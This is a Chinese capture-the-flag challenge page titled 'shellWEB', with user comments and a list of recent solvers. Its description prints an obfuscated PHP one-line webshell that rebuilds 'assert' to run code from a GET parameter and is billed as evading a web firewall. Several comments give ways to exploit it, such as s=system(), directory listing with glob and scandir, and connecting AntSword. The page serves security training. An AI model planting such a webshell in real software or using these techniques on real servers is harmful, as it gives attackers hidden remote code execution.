shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6515
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
Y1rannn 4年前

...没那么复杂啊,我直接s=system("")

回复 3

pest 4年前

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0

simpleboy 4年前

解法还是很多的

回复 0

simpleboy 4年前

命令执行了

回复 0

三分踯躅 4年前

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

GGBond9527 4年前

assert()代码执行漏洞

回复 1

xiaotan451 4年前

我是肖彪

回复 3
xiaotan451 4年前

@biaoxiao 我是流汗了

回复 0

biaoxiao 4年前

嗯 你说得对

回复 0

kaibaking 4年前

兄弟们,为什么我蚁剑连接数据为空,/index.php 连接密码s ?? 还是说不需要连接蚁剑?

回复 0
som3bady 4年前

他要求是get

回复 0

tzzzez 4年前

payload构建,蚁剑连接

回复 0
Retro 4年前

@ypp110 蚁剑似乎不能用get连,直接url里输吧

回复 0

ypp110 4年前

能否详细说下怎么用蚁剑连接

回复 1

哇哦~ 4年前

学到就是赚到

回复 0

WriteUp

image
harry

3 金币

评分(9)

解题动态

szb123 攻破了该题 2小时前
17361232956 攻破了该题 3小时前
皮蛋瘦肉粥 攻破了该题 4小时前
aaa1 攻破了该题 5小时前
初入CTF联盟 攻破了该题 7小时前
hahahahahahaha 攻破了该题 8小时前
GEcharacter 攻破了该题 8小时前
wujiayi 攻破了该题 11小时前
huangfeiyu 攻破了该题 13小时前
晚霞难掩秋色 攻破了该题 13小时前
Julia 攻破了该题 23小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 2天前
问题反馈